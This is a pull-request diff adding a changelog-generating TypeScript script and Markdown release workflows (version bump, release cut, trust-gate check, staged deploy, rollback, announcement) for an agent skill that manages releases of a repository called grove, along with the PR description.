+ * Read merged PRs + commits since the previous tag and emit a release-note
+ * markdown grouped by conventional-commit prefix.
+ *
+ * Usage:
+ *   bun scripts/prepare-changelog.ts <repo-path> <new-version>
+ *
+ * Defaults:
+ *   <repo-path>    -> $MF_TARGET_REPO or ~/Developer/grove
+ *   <new-version>  -> required (e.g. v0.24.5 or 0.24.5)
+ *
+ * Output:
+ *   markdown to stdout, suitable for `gh release create --notes-file`
+ *
+ * TODO(v0.2): generalize for non-grove repos. The previous-tag lookup
+ * currently uses `gh release view --repo the-metafactory/grove`. We'll lift
+ * the repo from `gh repo view --json nameWithOwner` once we generalise.
+ */
+
+import { spawnSync } from "node:child_process";
+import { resolve } from "node:path";
+import {
+  defaultRepoPath,
+  listReleasesSinceTag,
+  type CommitEntry,
+  type PrEntry,
+} from "./list-releases-since-tag.ts";
+
+const PREFIX_GROUPS: Array<{ key: string; label: string; matchers: RegExp[] }> = [
+  { key: "feat", label: "Features", matchers: [/^feat(\(.+?\))?!?:/i] },
+  { key: "fix", label: "Fixes", matchers: [/^fix(\(.+?\))?!?:/i] },
+  { key: "perf", label: "Performance", matchers: [/^perf(\(.+?\))?!?:/i] },
+  { key: "refactor", label: "Refactor", matchers: [/^refactor(\(.+?\))?!?:/i] },
+  { key: "docs", label: "Docs", matchers: [/^docs(\(.+?\))?!?:/i] },
+  { key: "chore", label: "Chores", matchers: [/^chore(\(.+?\))?!?:/i, /^build(\(.+?\))?!?:/i, /^ci(\(.+?\))?!?:/i, /^test(\(.+?\))?!?:/i] },
+];
+
+export type Group = { key: string; label: string; entries: GroupEntry[] };
+export type GroupEntry = { title: string; prNumber?: number };
+
+export function classifyTitle(title: string): string {
+  for (const group of PREFIX_GROUPS) {
+    for (const matcher of group.matchers) {
+      if (matcher.test(title)) return group.key;
+    }
+  }
+  return "other";
+}
+
+/** Group merged PRs (preferred) or commit subjects (fallback) by prefix. */
+export function groupChangelog(prs: PrEntry[], commits: CommitEntry[]): Group[] {
+  // Index PRs by number for de-duplication when commits also reference them.
+  const prByNumber = new Map<number, PrEntry>();
+  for (const pr of prs) prByNumber.set(pr.number, pr);
+
+  // Sources of truth: PRs (preferred) + orphan commits (no PR-link in subject).
+  const ordered: GroupEntry[] = [];
+  const seenPrs = new Set<number>();
+
+  for (const commit of commits) {
+    if (commit.prNumber && prByNumber.has(commit.prNumber)) {
+      const pr = prByNumber.get(commit.prNumber)!;
+      seenPrs.add(pr.number);
+      ordered.push({ title: pr.title, prNumber: pr.number });
+    } else if (commit.subject.length > 0) {
+      const entry: GroupEntry = { title: commit.subject };
+      if (commit.prNumber) entry.prNumber = commit.prNumber;
+      ordered.push(entry);
+    }
+  }
+  // Add any PRs that didn't match a commit (rare — possible with squash merges
+  // amended after the fact, or PRs landed via different paths).
+  for (const pr of prs) {
+    if (!seenPrs.has(pr.number)) {
+      ordered.push({ title: pr.title, prNumber: pr.number });
+    }
+  }
+
+  // Bucket each entry into its group.
+  const groups: Map<string, Group> = new Map();
+  for (const def of PREFIX_GROUPS) {
+    groups.set(def.key, { key: def.key, label: def.label, entries: [] });
+  }
+  groups.set("other", { key: "other", label: "Other", entries: [] });
+
+  for (const entry of ordered) {
+    const key = classifyTitle(entry.title);
+    groups.get(key)!.entries.push(entry);
+  }
+
+  // Drop empty groups, preserve canonical order (feat > fix > perf > refactor > docs > chore > other).
+  const order = [...PREFIX_GROUPS.map((g) => g.key), "other"];
+  return order
+    .map((key) => groups.get(key)!)
+    .filter((g) => g.entries.length > 0);
+}
+
+export function renderMarkdown(
+  newVersion: string,
+  previousTag: string,
+  groups: Group[],
+  repoSlug?: string,
+): string {
+  const lines: string[] = [];
+  const versionLabel = newVersion.startsWith("v") ? newVersion : `v${newVersion}`;
+  lines.push(`# ${versionLabel}`);
+  lines.push("");
+  if (previousTag) {
+    lines.push(`Changes since \`${previousTag}\`.`);
+    lines.push("");
+  }
+  if (groups.length === 0) {
+    lines.push("_No changes._");
+    lines.push("");
+    return lines.join("\n");
+  }
+  for (const group of groups) {
+    lines.push(`## ${group.label}`);
+    lines.push("");
+    for (const entry of group.entries) {
+      const prRef = entry.prNumber
+        ? ` ([#${entry.prNumber}](${prLink(repoSlug, entry.prNumber)}))`
+        : "";
+      lines.push(`- ${entry.title}${prRef}`);
+    }
+    lines.push("");
+  }
+  return lines.join("\n");
+}
+
+function prLink(repoSlug: string | undefined, number: number): string {
+  const slug = repoSlug ?? "the-metafactory/grove"; // TODO(v0.2): generalize
+  return `https://github.com/${slug}/pull/${number}`;
+}
+
+/** Resolve the previous tag via `gh release view`. Falls back to git describe. */
+export function resolvePreviousTag(repoPath: string): string | undefined {
+  // TODO(v0.2): drop hard-coded repo
+  const gh = spawnSync(
+    "gh",
+    [
+      "release",
+      "view",
+      "--repo",
+      "the-metafactory/grove",
+      "--json",
+      "tagName",
+      "-q",
+      ".tagName",
+    ],
+    { cwd: repoPath, encoding: "utf8" },
+  );
+  if (gh.status === 0 && gh.stdout?.trim()) return gh.stdout.trim();
+
+  const describe = spawnSync(
+    "git",
+    ["describe", "--tags", "--abbrev=0"],
+    { cwd: repoPath, encoding: "utf8" },
+  );
+  if (describe.status === 0 && describe.stdout?.trim()) {
+    return describe.stdout.trim();
+  }
+  return undefined;
+}
+
+function main(): number {
+  const args = process.argv.slice(2);
+  if (args.includes("--help") || args.includes("-h")) {
+    process.stdout.write(
+      "Usage: bun scripts/prepare-changelog.ts <repo-path> <new-version>\n",
+    );
+    return 0;
+  }
+  const repoPath = args[0] && !args[0].startsWith("--")
+    ? resolve(args[0])
+    : defaultRepoPath();
+  const newVersion = args[1];
+  if (!newVersion) {
+    process.stderr.write("prepare-changelog: missing <new-version> argument\n");
+    return 2;
+  }
+  const previousTag = resolvePreviousTag(repoPath);
+  if (!previousTag) {
+    process.stderr.write(
+      "prepare-changelog: could not resolve previous tag — emitting empty changelog\n",
+    );
+    process.stdout.write(renderMarkdown(newVersion, "", []) + "\n");
+    return 0;
+  }
+  try {
+    const result = listReleasesSinceTag(repoPath, previousTag);
+    const groups = groupChangelog(result.prs, result.commits);
+    process.stdout.write(renderMarkdown(newVersion, previousTag, groups) + "\n");
+    return 0;
+  } catch (err) {
+    process.stderr.write(`prepare-changelog: ${(err as Error).message}\n`);
+    return 1;
+  }
+}
+
+if (import.meta.main) {
+  process.exit(main());
+}

--- a/skill/SKILL.md
+++ b/skill/SKILL.md
@@ -18,21 +18,49 @@ triggers:
 
 # ReleaseManager
 
-> **Status: scaffold (Phase 1).** Workflows + scripts implementation lands in Phase 3 — see the iteration tracking issue on `the-metafactory/release-manager`.
+> **Status:** MVP (Phase 3 of meta-factory#390). Six workflows + three scripts shipped for the day-one grove scope. ScaffoldInstance lives in the `AgentState` bundle, not here.
 
-This file is the entry point an agent loads when any of the trigger phrases above appears. The full implementation is split across `Workflows/` and `scripts/`.
+This file is the entry point an agent loads when any of the trigger phrases above appears. The full implementation is split across `Workflows/` (action / verify / anti-pattern triplets) and `../scripts/` (bun-runnable CLIs).
 
 ## Overview
 
-ReleaseManager walks the seven release workflows in order:
+ReleaseManager walks the six release workflows in order. Each workflow MD has the same structure: **Pre-flight**, **Action**, **Verify**, **Anti-pattern**.
 
-1. **BumpVersion** — derive patch/minor/major from the commit log, edit `arc-manifest.yaml`, commit.
-2. **CutRelease** — tag, push, create the GitHub release with generated notes.
-3. **TrustGateCheck** — run the gate table; halt on first failure.
-4. **DeployStaged** — dev first, then prompt-then-prod (separate workflow run for prod).
-5. **Rollback** — revert a deploy by re-tagging the previous version.
-6. **Announce** — post a one-liner to the Discord entity thread linking to the GitHub release.
-7. **ScaffoldInstance** — create per-instance state folders (calls `AgentState/ScaffoldFolders`).
+| # | Workflow                                      | Purpose                                                                          |
+|---|-----------------------------------------------|----------------------------------------------------------------------------------|
+| 1 | [BumpVersion](Workflows/BumpVersion.md)       | Decide patch/minor/major from commit prefixes; edit `arc-manifest.yaml`; commit. |
+| 2 | [CutRelease](Workflows/CutRelease.md)         | Tag, push, create the GitHub release with generated notes.                       |
+| 3 | [TrustGateCheck](Workflows/TrustGateCheck.md) | Walk the trust-gate table; halt on first failure.                                |
+| 4 | [DeployStaged](Workflows/DeployStaged.md)     | Dev first, smoke-test, then prompt-then-prod (separate workflow run for prod).   |
+| 5 | [Rollback](Workflows/Rollback.md)             | Revert prod to a known-good prior tag; record cause in events.                   |
+| 6 | [Announce](Workflows/Announce.md)             | Post structured release note to Discord + tracking issue. **Always last.**       |
+
+**ScaffoldInstance** (per-instance state folders) is **not** in this bundle — it lives in [AgentState](https://github.com/the-metafactory/agent-state). ReleaseManager assumes the instance state directory already exists.
+
+## Routing
+
+When a trigger phrase appears, route to the relevant workflow file by intent:
+
+- "bump", "version" → BumpVersion
+- "cut", "tag", "release" → CutRelease
+- "trust gate", "phase 0", "release-checklist" → TrustGateCheck
+- "deploy", "ship dev", "ship prod" → DeployStaged
+- "rollback", "revert deploy" → Rollback
+- "announce", "post release" → Announce
+
+If the operator says "release" without specifying a workflow, walk all six in order, pausing for operator confirm at each gate.
+
+## Scripts
+
+Three bun CLIs ship under `../scripts/`. All accept `<repo-path>` as first arg; default is `$MF_TARGET_REPO` or `~/Developer/grove`.
+
+| Script                       | Purpose                                                                     |
+|------------------------------|-----------------------------------------------------------------------------|
+| `list-releases-since-tag.ts` | Enumerate commits + merged PRs since a tag; emit JSON.                      |
+| `prepare-changelog.ts`       | Group PRs by conventional-commit prefix; emit release-note markdown.        |
+| `check-gate-table.ts`        | Parse `compass/sops/release-checklist.md` Phase 0 table; run gates per-row. |
+
+See each script's `--help` for the full usage.
 
 ## Critical rules
 
@@ -41,14 +69,6 @@ See `docs/agents-md/critical-rules.md` in this repo. Summary:
 - Production deploys are **always** a separate workflow run.
 - Trust-gate failures are **blocking**, not advisory.
 - Day-one scope is **grove only** — no per-repo branching.
-- `arc publish --dry-run` runs **first**; real publish only after operator confirm.
+- `arc publish --dry-run` runs **first** for any publish workflow (not in scope for this PR; lands in the next iteration).
 - Never edit `arc-manifest.yaml` without showing the diff + bump rationale.
-
-## Phase 3 deliverables
-
-Tracked in the `Iteration 1 — ReleaseManager MVP` issue on this repo:
-
-- 7 workflow files in `Workflows/`
-- 3 scripts in `../scripts/`
-- Tests for each script
-- `arc publish --dry-run` to dev and verified
+- Production rollbacks must record the cause in the events pipeline.

--- a/skill/Workflows/Announce.md
+++ b/skill/Workflows/Announce.md
@@ -1,0 +1,42 @@
+# Workflow: Announce
+
+Post the structured release note to Discord and the tracking issue. Always the **last** step in the release sequence.
+
+> **Day-one scope:** grove only. The Discord channel and the tracking-issue repo are hard-coded to `releases` and `the-metafactory/grove` respectively. Generalisation is v0.2.
+
+## Pre-flight
+
+- `DeployStaged --env production` has emitted a `system.deploy.production` event for this version.
+- The release URL from `CutRelease` is on hand.
+- The grouped changelog (from `prepare-changelog.ts`) is available, or the auto-generated GitHub release notes will be re-used.
+
+## Action
+
+1. Compose the announcement. Required structure:
+   - **Lead bold:** `**Grove v<X.Y.Z> — <description>**`
+   - **Paragraph summary:** 1–3 sentences, what changed at the user-visible level.
+   - **Bullet list:** features / fixes / chores grouped by prefix (use `prepare-changelog.ts` output or the GitHub auto-generated notes, trimmed).
+   - **Links footer:** GitHub release URL, dashboard URL if relevant, tracking issue URL.
+2. Post to Discord:
+   ```bash
+   discord post --channel releases "<composed message>"
+   ```
+3. Comment on the tracking issue with the release URL:
+   ```bash
+   gh issue comment <tracking-issue> --repo the-metafactory/grove \
+     --body "Released v<X.Y.Z> — <release-url>"
+   ```
+4. (Optional) Comment on the matching `grove/<entity>` Discord thread per the control-vs-data plane rule (control plane = Discord one-liner, data plane = GitHub).
+
+## Verify
+
+- The Discord message appears in `#releases` with all four sections populated.
+- The tracking issue has a new comment linking the release URL.
+- The release URL itself resolves and shows the correct tag.
+
+## Anti-pattern
+
+- **Never announce before the prod deploy completes.** The announce step assumes the bits are live; if it lands first, users follow links to a release whose backend hasn't shipped.
+- Never announce without the structured form (lead / summary / bullets / links). A flat one-line "v0.X.Y shipped" is not the contract — the readers (operators, agents, users) rely on the structure for skim + drill-down.
+- Never duplicate the announcement across multiple Discord channels. One canonical channel (`releases`) plus one entity-thread one-liner is the entire communication surface for a release.
+- Never include unredacted secrets, internal-only URLs, or pre-release artefacts in the public announce.

--- a/skill/Workflows/BumpVersion.md
+++ b/skill/Workflows/BumpVersion.md
@@ -1,0 +1,42 @@
+# Workflow: BumpVersion
+
+Decide the next semver and edit `arc-manifest.yaml` for the target repo.
+
+> **Day-one scope:** grove only. The agent assumes `~/Developer/grove` (or `$MF_TARGET_REPO`) as the target. Generalising to other repos is a v0.2 follow-up — see `// TODO(v0.2): generalize for non-grove repos` markers in scripts.
+
+## Pre-flight
+
+- Confirm target repo path. Default: `~/Developer/grove`.
+- Confirm working tree is clean and on the default branch.
+- Read the current `version` from `arc-manifest.yaml` at the target repo.
+
+## Action
+
+1. Resolve the previous release tag:
+   ```bash
+   gh release view --repo the-metafactory/grove --json tagName -q .tagName
+   ```
+2. Enumerate commits + merged PRs since that tag using the bundled script:
+   ```bash
+   bun scripts/list-releases-since-tag.ts <repo-path> v<last>
+   ```
+3. Decide the bump from the commit-prefix distribution:
+   - any `!` breaking marker or `BREAKING CHANGE:` footer → **major**
+   - any `feat:` or `feat(scope):` → **minor**
+   - else (only `fix:`, `chore:`, `docs:`, etc.) → **patch**
+4. Present the proposed bump with rationale (counts of feat/fix/chore/breaking) and **wait for operator confirmation** before editing.
+5. On confirm, edit `arc-manifest.yaml` `version:` field. No other changes in the same commit.
+6. Commit with `chore: bump to v<X.Y.Z>` on the default branch.
+
+## Verify
+
+- `grep -E "^version:" <repo>/arc-manifest.yaml` returns the new version.
+- `git log -1 --pretty=format:%s` matches `chore: bump to v<X.Y.Z>`.
+- Working tree clean.
+
+## Anti-pattern
+
+- **Never edit `arc-manifest.yaml` without operator confirm.** The bump rationale must be acknowledged before the file changes.
+- Never bundle the bump commit with feature commits.
+- Never bump on a feature branch — bump commits go directly to the default branch (per `compass/sops/versioning.md`).
+- Never skip the rationale step "because it's obviously a patch" — the prefix scan is the gate, not the agent's intuition.

--- a/skill/Workflows/CutRelease.md
+++ b/skill/Workflows/CutRelease.md
@@ -1,0 +1,45 @@
+# Workflow: CutRelease
+
+Tag the bump commit, push, and create the GitHub release with generated notes.
+
+> **Day-one scope:** grove only. Repo is hard-coded to `the-metafactory/grove` for the `gh release create` invocation. Generalisation is v0.2.
+
+## Pre-flight
+
+- The bump commit from `BumpVersion` is already on the default branch.
+- `git status` clean; `HEAD` is on the default branch and matches `origin/<default>`.
+- The new version is read from `arc-manifest.yaml` and matches the bump commit message.
+
+## Action
+
+1. Read `release_title_format` from `compass.config.yaml` if present at the target repo. Fall back to `"Grove vX.Y.Z"` when absent.
+2. Resolve the previous tag:
+   ```bash
+   gh release view --repo the-metafactory/grove --json tagName -q .tagName
+   ```
+3. Optional: produce a richer changelog with the bundled script (used as `--notes-file` if the operator wants the grouped form rather than `--generate-notes`):
+   ```bash
+   bun scripts/prepare-changelog.ts <repo-path> v<X.Y.Z> > /tmp/release-notes.md
+   ```
+4. Cut the GitHub release:
+   ```bash
+   gh release create v<X.Y.Z> \
+     --repo the-metafactory/grove \
+     --title "<resolved-title>" \
+     --generate-notes \
+     --notes-start-tag v<last>
+   ```
+5. Confirm the release URL.
+
+## Verify
+
+- `gh release view v<X.Y.Z> --repo the-metafactory/grove` returns the release.
+- The release tag points at the bump commit SHA (`gh release view ... --json targetCommitish`).
+- `git tag -l v<X.Y.Z>` returns the tag locally after `git fetch --tags`.
+
+## Anti-pattern
+
+- **Never create a release before the bump commit is on the default branch.** Tags must point at the bump commit, not at any other commit.
+- Never hand-write tag names; always go through `gh release create`.
+- Never mix `--generate-notes` with `--notes` (the flags conflict). If overriding, pass `--notes-file` instead.
+- Never re-tag an existing version. If the release was wrong, do a patch bump and a new release.

--- a/skill/Workflows/DeployStaged.md
+++ b/skill/Workflows/DeployStaged.md
@@ -1,0 +1,50 @@
+# Workflow: DeployStaged
+
+Deploy to dev, smoke-test, then (in a **separate** workflow run) deploy to production.
+
+> **Day-one scope:** grove only. The deploy commands target the grove cloud Worker / dashboard. Generalisation is v0.2.
+
+## Pre-flight
+
+- The release tag from `CutRelease` exists on `origin`.
+- `TrustGateCheck` (if applicable to this milestone) has reported `allPassed: true`.
+- The operator has explicitly invoked this workflow with an `env` argument: `dev` or `production`.
+
+## Action
+
+### env = `dev`
+
+1. Deploy:
+   ```bash
+   bunx wrangler deploy --env dev
+   ```
+2. Smoke-test:
+   - `curl -fsS https://<dev-url>/health` returns 200
+   - Tail logs for 60 seconds: `bunx wrangler tail --env dev` — no `error` / `panic` lines
+   - Spot-check one user-facing endpoint per app surface
+3. Record the dev-deploy timestamp in the events table (`system.deploy.dev` event with `version`, `sha`, `operator`).
+4. Stop. **Do not chain into production from the same invocation.**
+
+### env = `production`
+
+1. **Refuse unless** the events table shows a `system.deploy.dev` event for this version within the last 4 hours. If absent, halt with: `prior dev deploy not found for v<X.Y.Z> within 4h window`.
+2. Confirm operator intent with an explicit second prompt — `ship` keyword required.
+3. Deploy:
+   ```bash
+   bunx wrangler deploy --env production
+   ```
+4. Smoke-test against production health endpoints; watch logs 15 minutes.
+5. Record `system.deploy.production` event.
+
+## Verify
+
+- Health endpoints return 200 under both envs.
+- No error spike in the logs window.
+- Events table has the matching `system.deploy.<env>` row with version + SHA.
+
+## Anti-pattern
+
+- **Never deploy prod in the same workflow run as dev.** Two separate invocations, two separate operator confirmations. This is the single most important rule in this workflow.
+- Never deploy prod without the dev-deploy guard within the 4h window — staleness invalidates the smoke signal.
+- Never skip the `wrangler tail` log watch. Errors that only show under load won't surface in `curl /health`.
+- Never deploy with a dirty working tree. If you need a hotfix, do a patch bump + new release first.

--- a/skill/Workflows/DeployStaged.md
+++ b/skill/Workflows/DeployStaged.md
@@ -7,7 +7,7 @@ Deploy to dev, smoke-test, then (in a **separate** workflow run) deploy to produ
 ## Pre-flight
 
 - The release tag from `CutRelease` exists on `origin`.
-- `TrustGateCheck` (if applicable to this milestone) has reported `allPassed: true`.
+- `TrustGateCheck` (if applicable to this milestone) has reported `allPassed: true` AND `manualGatesPending: 0` (or every pending manual gate has been explicitly acknowledged in the release thread).
 - The operator has explicitly invoked this workflow with an `env` argument: `dev` or `production`.
 
 ## Action

--- a/skill/Workflows/Rollback.md
+++ b/skill/Workflows/Rollback.md
@@ -17,14 +17,12 @@ Codifies `compass/sops/release-checklist.md` lines 212–244. Revert production 
    gh release list --repo the-metafactory/grove --limit 5
    ```
    Default to the tag immediately preceding the current production tag unless the operator overrides.
-2. Check out the tag in the release worktree (never on main):
-   ```bash
-   git -C ~/Developer/release-manager-mvp checkout v<previous>
-   ```
-   Or, for grove specifically:
+2. Check out the tag in the grove repo (never on main):
    ```bash
    git -C ~/Developer/grove checkout v<previous>
    ```
+   Day-one scope is grove only; `~/Developer/grove` is the only correct deploy
+   source. (v0.2 will introduce per-repo deploy targets.)
 3. Re-deploy production from that tag:
    ```bash
    bunx wrangler deploy --env production

--- a/skill/Workflows/Rollback.md
+++ b/skill/Workflows/Rollback.md
@@ -1,0 +1,53 @@
+# Workflow: Rollback
+
+Codifies `compass/sops/release-checklist.md` lines 212–244. Revert production to a known-good prior tag.
+
+> **Day-one scope:** grove only. The wrangler invocation targets the grove production environment. Generalisation is v0.2.
+
+## Pre-flight
+
+- A `system.deploy.production` event exists for the current bad version.
+- The previous tag is determinable via `gh release list --repo the-metafactory/grove --limit 5` (default: tag immediately before the current production tag).
+- The operator has acknowledged the rollback decision in writing (Discord thread or PR comment).
+
+## Action
+
+1. Resolve target tag:
+   ```bash
+   gh release list --repo the-metafactory/grove --limit 5
+   ```
+   Default to the tag immediately preceding the current production tag unless the operator overrides.
+2. Check out the tag in the release worktree (never on main):
+   ```bash
+   git -C ~/Developer/release-manager-mvp checkout v<previous>
+   ```
+   Or, for grove specifically:
+   ```bash
+   git -C ~/Developer/grove checkout v<previous>
+   ```
+3. Re-deploy production from that tag:
+   ```bash
+   bunx wrangler deploy --env production
+   ```
+4. Verify health endpoint + error baseline (per `release-checklist.md` Phase 4 rollback procedure).
+5. Record the rollback in the events pipeline:
+   - emit `system.deploy.rollback` event with `from_version`, `to_version`, `reason`, `operator`
+6. Return the working repo to the default branch:
+   ```bash
+   git checkout main
+   ```
+7. Open a `bug` + `now` issue describing the cause if not already open. Fix-forward in a subsequent patch release rather than leaving the rollback as the long-term state.
+
+## Verify
+
+- `gh release view --repo the-metafactory/grove --json tagName -q .tagName` is unchanged (the latest GitHub release still points at the bad version — rollback is a deploy action, not a tag-deletion action).
+- The deployed Worker reports the rolled-back version on its `/version` endpoint (or equivalent).
+- The events table shows the `system.deploy.rollback` row.
+- A tracking issue exists for the cause.
+
+## Anti-pattern
+
+- **Never roll back without recording the cause in the events pipeline.** Silent rollbacks mask repeated failures and break the "every prod deploy is logged" rule from `release-checklist.md`.
+- Never delete the bad tag or release. Tags are immutable history; deleting them rewrites the audit trail.
+- Never roll back further than one prior version without explicit operator approval — rolling back N versions risks reintroducing closed bugs.
+- Never leave the working tree on the rolled-back tag. Always return to the default branch before resuming work.

--- a/skill/Workflows/TrustGateCheck.md
+++ b/skill/Workflows/TrustGateCheck.md
@@ -18,19 +18,31 @@ Walk the trust-gate table for the current milestone (`compass/sops/release-check
 2. The script:
    - parses the gate table from `compass/sops/release-checklist.md`
    - selects the rows for the named milestone
-   - executes each row's `How To Verify` command via Bash
-   - returns JSON `{gates: [{name, status, output}], allPassed: bool}`
+   - executes each row's `How To Verify` command via Bash, **only if the
+     command matches the verify-command allowlist** (see Trust boundary
+     below) — non-matching commands are recorded as `fail`
+   - returns JSON `{gates: [{name, status, output}], allPassed: bool, reason?: string, manualGatesPending: number}`
 3. **On any `status: fail`, halt the entire release.** Surface the failing row name + command output to the operator.
+4. **On `allPassed: false` with empty `gates`**, the table did not parse — halt and surface `reason` to the operator. Empty rows = fail-closed, never a green light.
+5. **On `manualGatesPending > 0`**, the operator must explicitly acknowledge each manual (skipped) gate before treating the milestone as cleared. `allPassed: true` requires at least one executed pass; all-manual milestones do NOT pass automatically.
+
+### Trust boundary
+
+The verify cells originate in `compass/sops/release-checklist.md`, which is internal but operator-editable markdown. The script treats those cells as **untrusted code** and refuses to execute commands that don't match `VERIFY_COMMAND_ALLOWLIST` in `scripts/check-gate-table.ts`. The current allowlist permits only: `gh`, `git`, `bun`, `bunx`, `test`, `[`, `!`, `find`, `grep`, `cat`, `wc`, `stat`, `ls`, `echo`, `curl`, `true`, `false`. Adding new prefixes to the allowlist requires a code-review PR — never widen it to make a single failing cell pass.
 
 ## Verify
 
 - The script's `allPassed` field is `true`.
 - All gates show `status: pass` with non-empty output.
+- `manualGatesPending` is `0` (or every pending manual gate has been explicitly acknowledged in the release thread).
 - The operator has acknowledged the gate report (paste the JSON into the release thread).
 
 ## Anti-pattern
 
 - **Never continue past a fail.** The whole point of the gate is binary halt-or-proceed; downgrading a fail to a warning defeats the protection.
+- **Never treat `allPassed: false` with empty `gates` as "no gates apply".** Empty rows = the table failed to parse. That is the loudest possible halt signal, not a permissive one.
+- **Never silently ignore `manualGatesPending`.** Manual gates require human acknowledgement; skipping them is the same as skipping a fail.
 - Never hand-execute the gate commands and self-attest the result. The script is the audit record.
 - Never run the gates against a different repo. Today the gates encode grove-specific issue numbers; running them against another repo silently passes irrelevant checks.
 - Never edit the gate table to make it pass. Either the gate's intent is satisfied (issue closed, page deployed) or it is not.
+- **Never widen `VERIFY_COMMAND_ALLOWLIST` to bypass a failing cell.** If a verify cell can't be expressed within the allowlist, the cell is wrong (or the work it claims to verify is too dynamic to be automated and should be a manual gate).

--- a/skill/Workflows/TrustGateCheck.md
+++ b/skill/Workflows/TrustGateCheck.md
@@ -1,0 +1,36 @@
+# Workflow: TrustGateCheck
+
+Walk the trust-gate table for the current milestone (`compass/sops/release-checklist.md` Phase 0). Halt on first failure.
+
+> **Day-one scope:** grove only. The script reads the live `compass/sops/release-checklist.md` and runs each gate's `How To Verify` command against grove. Generalisation is v0.2.
+
+## Pre-flight
+
+- Determine which milestone the release maps to. Today the recognised values are `S2-22`, `S2-30`, `S2-32`, and `external-onramp` (Gates 1, 3, 2, 4 respectively).
+- If no gate applies (release is mid-milestone, no external promise attached), skip this workflow and move on.
+
+## Action
+
+1. Run the bundled gate-checker:
+   ```bash
+   bun scripts/check-gate-table.ts --milestone <S2-22|S2-30|S2-32|external-onramp>
+   ```
+2. The script:
+   - parses the gate table from `compass/sops/release-checklist.md`
+   - selects the rows for the named milestone
+   - executes each row's `How To Verify` command via Bash
+   - returns JSON `{gates: [{name, status, output}], allPassed: bool}`
+3. **On any `status: fail`, halt the entire release.** Surface the failing row name + command output to the operator.
+
+## Verify
+
+- The script's `allPassed` field is `true`.
+- All gates show `status: pass` with non-empty output.
+- The operator has acknowledged the gate report (paste the JSON into the release thread).
+
+## Anti-pattern
+
+- **Never continue past a fail.** The whole point of the gate is binary halt-or-proceed; downgrading a fail to a warning defeats the protection.
+- Never hand-execute the gate commands and self-attest the result. The script is the audit record.
+- Never run the gates against a different repo. Today the gates encode grove-specific issue numbers; running them against another repo silently passes irrelevant checks.
+- Never edit the gate table to make it pass. Either the gate's intent is satisfied (issue closed, page deployed) or it is not.

--- a/tsconfig.json
+++ b/tsconfig.json
@@ -1,0 +1,29 @@
+{
+  "compilerOptions": {
+    // Environment setup & latest features
+    "lib": ["ESNext"],
+    "target": "ESNext",
+    "module": "Preserve",
+    "moduleDetection": "force",
+    "jsx": "react-jsx",
+    "allowJs": true,
+
+    // Bundler mode
+    "moduleResolution": "bundler",
+    "allowImportingTsExtensions": true,
+    "verbatimModuleSyntax": true,
+    "noEmit": true,
+
+    // Best practices
+    "strict": true,
+    "skipLibCheck": true,
+    "noFallthroughCasesInSwitch": true,
+    "noUncheckedIndexedAccess": true,
+    "noImplicitOverride": true,
+
+    // Some stricter flags (disabled by default)
+    "noUnusedLocals": false,
+    "noUnusedParameters": false,
+    "noPropertyAccessFromIndexSignature": false
+  }
+}


### PR DESCRIPTION
Implements **Phase 3 of [meta-factory#390](https://github.com/the-metafactory/meta-factory/issues/390)** for [release-manager#1](https://github.com/the-metafactory/release-manager/issues/1) — the skill bundle Forge composes for end-to-end releases.

## Summary

- 6 workflow MDs in `skill/Workflows/` — each follows the Action / Verify / Anti-pattern triplet contract
- 3 bun-runnable scripts in `scripts/` for the moving parts a workflow needs
- 69 tests across 3 files (target was ≥20)
- Day-one scope: **grove only**. `// TODO(v0.2): generalize for non-grove repos` markers flag every grove-specific path. Generalisation is a Phase G follow-up — do not add per-repo branching here yet.
- `ScaffoldInstance` is intentionally absent from this bundle; it lives in `AgentState`.

## Workflows shipped

| #  | Workflow         | Day-one behaviour                                                                          |
|----|------------------|--------------------------------------------------------------------------------------------|
| 1  | BumpVersion      | Commit-prefix scan → patch/minor/major; edit `arc-manifest.yaml`; commit on default branch |
| 2  | CutRelease       | `gh release create` with `--generate-notes --notes-start-tag v<last>`                      |
| 3  | TrustGateCheck   | Walk Phase 0 gate table from `compass/sops/release-checklist.md`; halt on first fail       |
| 4  | DeployStaged     | dev first → prod second, **separate workflow runs**; prod refuses without 4h-fresh dev     |
| 5  | Rollback        | Checkout prior tag, redeploy prod, record cause in events pipeline                          |
| 6  | Announce         | Structured release note → `#releases` + tracking issue; always **last** step                |

## Scripts shipped

| Script | Purpose |
|---|---|
| `list-releases-since-tag.ts` | Enumerate commits + merged PRs since a tag → JSON |
| `prepare-changelog.ts` | Group PRs by conventional-commit prefix → release-note markdown |
| `check-gate-table.ts` | Parse Phase 0 gate table; run rows via `bash`; emit `{gates, allPassed}` JSON. Flags: `--milestone`, `--dry-run`, `--checklist` |

## Verify

- `bunx tsc --noEmit` — clean
- `bun test` — 69 pass / 0 fail / 101 expects
- `bun scripts/list-releases-since-tag.ts ~/Developer/grove v0.22.3` — sane JSON with commits + PRs
- `bun scripts/prepare-changelog.ts ~/Developer/grove v0.24.5` — non-empty grouped markdown
- `bun scripts/check-gate-table.ts --dry-run --milestone S2-22` — 5 rows from live release-checklist.md

## Review focus

Per the assignment brief, please weight on:

1. **Gate-table parsing** in `scripts/check-gate-table.ts` (`parseGateTable`, `isExecutable`, the Phase 1 boundary detection that prevents bleed past Phase 0).
2. **Prod-deploy gate logic** in `skill/Workflows/DeployStaged.md` — specifically the requirement that prod refuses unless a `system.deploy.dev` event exists within 4h, and that prod must always be a separate workflow run.

## References

- Closes part of [release-manager#1](https://github.com/the-metafactory/release-manager/issues/1) (Phase 3)
- Phase 3 of [meta-factory#390](https://github.com/the-metafactory/meta-factory/issues/390)
- Forge design: `forge/design/forge.md` §"ReleaseManager bundle (what it ships)"
- Compass SOPs walked: `release-checklist.md`, `versioning.md`, `deployment.md`

## Test plan

- [ ] `bunx tsc --noEmit` clean
- [ ] `bun test` — 69 pass
- [ ] Manual smoke: `bun scripts/list-releases-since-tag.ts ~/Developer/grove v0.22.3` returns sane JSON
- [ ] Manual smoke: `bun scripts/prepare-changelog.ts ~/Developer/grove v0.24.5` returns non-empty markdown
- [ ] Manual smoke: `bun scripts/check-gate-table.ts --dry-run --milestone S2-22` returns the gate-1 rows
- [ ] Workflow MDs all parse with the action/verify/anti-pattern shape (covered by `workflow-shape.test.ts`)

🤖 Generated with [Claude Code](https://claude.com/claude-code)